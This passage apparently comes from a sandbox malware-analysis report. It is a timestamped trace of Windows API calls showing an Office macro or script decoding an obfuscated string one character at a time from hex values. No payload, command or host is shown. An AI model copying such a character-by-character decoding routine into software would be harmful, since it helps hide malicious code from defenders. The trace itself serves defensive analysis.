VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.970] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.970] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.970] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.970] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.971] GetUserDefaultLCID () returned 0x409 [0174.971] malloc (_Size=0xa0) returned 0x11f50080 [0174.971] free (_Block=0x11f50080) [0174.971] VarBstrCat (in: bstrLeft="&H", bstrRight="8e", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.971] GetUserDefaultLCID () returned 0x409 [0174.971] VarI2FromStr (in: strIn="&H8e", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.971] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="4") returned 1 [0174.971] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.972] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.972] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.972] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.972] GetUserDefaultLCID () returned 0x409 [0174.972] malloc (_Size=0xa0) returned 0x11f50080 [0174.972] free (_Block=0x11f50080) [0174.972] VarBstrCat (in: bstrLeft="&H", bstrRight="cb", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.972] GetUserDefaultLCID () returned 0x409 [0174.972] VarI2FromStr (in: strIn="&Hcb", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.972] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0174.973] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.973] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.973] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.973] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.973] GetUserDefaultLCID () returned 0x409 [0174.973] malloc (_Size=0xa0) returned 0x11f50080 [0174.973] free (_Block=0x11f50080) [0174.973] VarBstrCat (in: bstrLeft="&H", bstrRight="cb", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.973] GetUserDefaultLCID () returned 0x409 [0174.973] VarI2FromStr (in: strIn="&Hcb", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.974] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0174.974] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.974] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.974] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.974] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.974] GetUserDefaultLCID () returned 0x409 [0174.974] malloc (_Size=0xa0) returned 0x11f50080 [0174.974] free (_Block=0x11f50080) [0174.974] VarBstrCat (in: bstrLeft="&H", bstrRight="da", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.975] GetUserDefaultLCID () returned 0x409 [0174.975] VarI2FromStr (in: strIn="&Hda", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.975] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0174.975] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.975] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.975] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.975] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.975] GetUserDefaultLCID () returned 0x409 [0174.975] malloc (_Size=0xa0) returned 0x11f50080 [0174.975] free (_Block=0x11f50080) [0174.976] VarBstrCat (in: bstrLeft="&H", bstrRight="a3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.976] GetUserDefaultLCID () returned 0x409 [0174.976] VarI2FromStr (in: strIn="&Ha3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.976] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="4") returned 1 [0174.976] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.976] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.976] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.976] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.976] GetUserDefaultLCID () returned 0x409 [0174.976] malloc (_Size=0xa0) returned 0x11f50080 [0174.976] free (_Block=0x11f50080) [0174.977] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.977] GetUserDefaultLCID () returned 0x409 [0174.977] VarI2FromStr (in: strIn="&H90", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.977] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.977] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.977] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.977] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.977] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.977] GetUserDefaultLCID () returned 0x409 [0174.978] malloc (_Size=0xa0) returned 0x11f50080 [0174.978] free (_Block=0x11f50080) [0174.978] VarBstrCat (in: bstrLeft="&H", bstrRight="e4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.978] GetUserDefaultLCID () returned 0x409 [0174.978] VarI2FromStr (in: strIn="&He4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.978] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0174.978] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.978] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.979] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.979] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.979] GetUserDefaultLCID () returned 0x409 [0174.979] malloc (_Size=0xa0) returned 0x11f50080 [0174.979] free (_Block=0x11f50080) [0174.979] VarBstrCat (in: bstrLeft="&H", bstrRight="ae", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.979] GetUserDefaultLCID () returned 0x409 [0174.979] VarI2FromStr (in: strIn="&Hae", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.979] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0174.980] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.980] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.980] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.980] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.980] GetUserDefaultLCID () returned 0x409 [0174.980] malloc (_Size=0xa0) returned 0x11f50080 [0174.980] free (_Block=0x11f50080) [0174.980] VarBstrCat (in: bstrLeft="&H", bstrRight="d3", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.980] GetUserDefaultLCID () returned 0x409 [0174.980] VarI2FromStr (in: strIn="&Hd3", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.981] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0174.981] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.981] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.981] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.981] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.981] GetUserDefaultLCID () returned 0x409 [0174.981] malloc (_Size=0xa0) returned 0x11f50080 [0174.981] free (_Block=0x11f50080) [0174.982] VarBstrCat (in: bstrLeft="&H", bstrRight="9c", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.982] GetUserDefaultLCID () returned 0x409 [0174.982] VarI2FromStr (in: strIn="&H9c", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.982] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0174.982] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.982] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.982] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0174.982] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.982] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.983] GetUserDefaultLCID () returned 0x409 [0174.983] malloc (_Size=0xa0) returned 0x11f50080 [0174.983] free (_Block=0x11f50080) [0174.983] VarBstrCat (in: bstrLeft="&H", bstrRight="ba", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.983] GetUserDefaultLCID () returned 0x409 [0174.983] VarI2FromStr (in: strIn="&Hba", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.983] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0174.987] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.987] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.987] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.987] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.987] GetUserDefaultLCID () returned 0x409 [0174.988] malloc (_Size=0xa0) returned 0x11f50080 [0174.988] free (_Block=0x11f50080) [0174.988] VarBstrCat (in: bstrLeft="&H", bstrRight="d0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.988] GetUserDefaultLCID () returned 0x409 [0174.988] VarI2FromStr (in: strIn="&Hd0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.988] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0174.988] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.988] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.989] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.989] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.989] GetUserDefaultLCID () returned 0x409 [0174.989] malloc (_Size=0xa0) returned 0x11f50080 [0174.989] free (_Block=0x11f50080) [0174.989] VarBstrCat (in: bstrLeft="&H", bstrRight="c1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.989] GetUserDefaultLCID () returned 0x409 [0174.989] VarI2FromStr (in: strIn="&Hc1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.989] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0174.990] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.990] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.990] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.990] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.990] GetUserDefaultLCID () returned 0x409 [0174.990] malloc (_Size=0xa0) returned 0x11f50080 [0174.990] free (_Block=0x11f50080) [0174.990] VarBstrCat (in: bstrLeft="&H", bstrRight="a7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.990] GetUserDefaultLCID () returned 0x409 [0174.990] VarI2FromStr (in: strIn="&Ha7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.991] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="B") returned 1 [0174.991] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.991] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.991] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.991] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.991] GetUserDefaultLCID () returned 0x409 [0174.991] malloc (_Size=0xa0) returned 0x11f50080 [0174.991] free (_Block=0x11f50080) [0174.991] VarBstrCat (in: bstrLeft="&H", bstrRight="aa", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.992] GetUserDefaultLCID () returned 0x409 [0174.992] VarI2FromStr (in: strIn="&Haa", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.992] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0174.992] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.992] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.992] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.992] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.992] GetUserDefaultLCID () returned 0x409 [0174.992] malloc (_Size=0xa0) returned 0x11f50080 [0174.992] free (_Block=0x11f50080) [0174.993] VarBstrCat (in: bstrLeft="&H", bstrRight="c0", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0174.993] GetUserDefaultLCID () returned 0x409 [0174.993] VarI2FromStr (in: strIn="&Hc0", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0174.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0174.993] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0174.993] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.993] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.993] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0174.993] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0174.993] 